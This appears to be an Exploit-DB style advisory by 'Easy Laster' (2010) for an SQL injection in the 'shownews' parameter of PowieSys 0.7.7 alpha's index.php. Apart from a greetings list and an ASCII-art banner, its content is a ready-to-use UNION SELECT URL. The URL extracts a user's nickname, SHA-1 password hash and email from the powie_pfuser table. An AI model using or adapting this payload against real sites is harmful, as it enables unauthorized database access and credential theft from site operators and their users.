PowieSys 0.7.7 alpha - 'index.php' shownews SQL Injection

EDB-ID:

11840

CVE:

N/A


Platform:

PHP

Published:

2010-03-22

----------------------------Information------------------------------------------------
+Name : PowieSys <=  0.7.7 alpha index.php (shownews) SQL Injection Vulnerability
+Autor : Easy Laster
+Date   : 22.03.2010
+Script  : PowieSys <= 0.7.7 alpha
+Download : http://www.powie.de/cms/filedb/download.php?id=127
+Price : for free
+Language : PHP
+Discovered by Easy Laster
+Security Group 4004-Security-Project
+Greetz to Team-Internet ,Underground Agents
+And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok,
Kiba,-tmh-,Dr Chaos,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge,
N00bor,Damian,novaca!ne.

---------------------------------------------------------------------------------------
                                                                                     
 ___ ___ ___ ___                         _ _           _____           _         _   
| | |   |   | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___|  _  |___ ___  |_|___ ___| |_ 
|_  | | | | |_  |___|_ -| -_|  _| | |  _| |  _| | |___|   __|  _| . | | | -_|  _|  _|
  |_|___|___| |_|   |___|___|___|___|_| |_|_| |_  |   |__|  |_| |___|_| |___|___|_|  
                                              |___|                 |___|            


----------------------------------------------------------------------------------------
+Vulnerability : http://www.site.com/news/index.php?shownews='

The password is a SHA-1

+Exploitable   : http://www.site.com/news/index.php?shownews=999999'+union+select+1,2,3,
4,concat(nickname,0x3a,pwd,0x3a,email),6,7,8,9,10,11,12,13+from+powie_pfuser+where+id=1--+



-----------------------------------------------------------------------------------------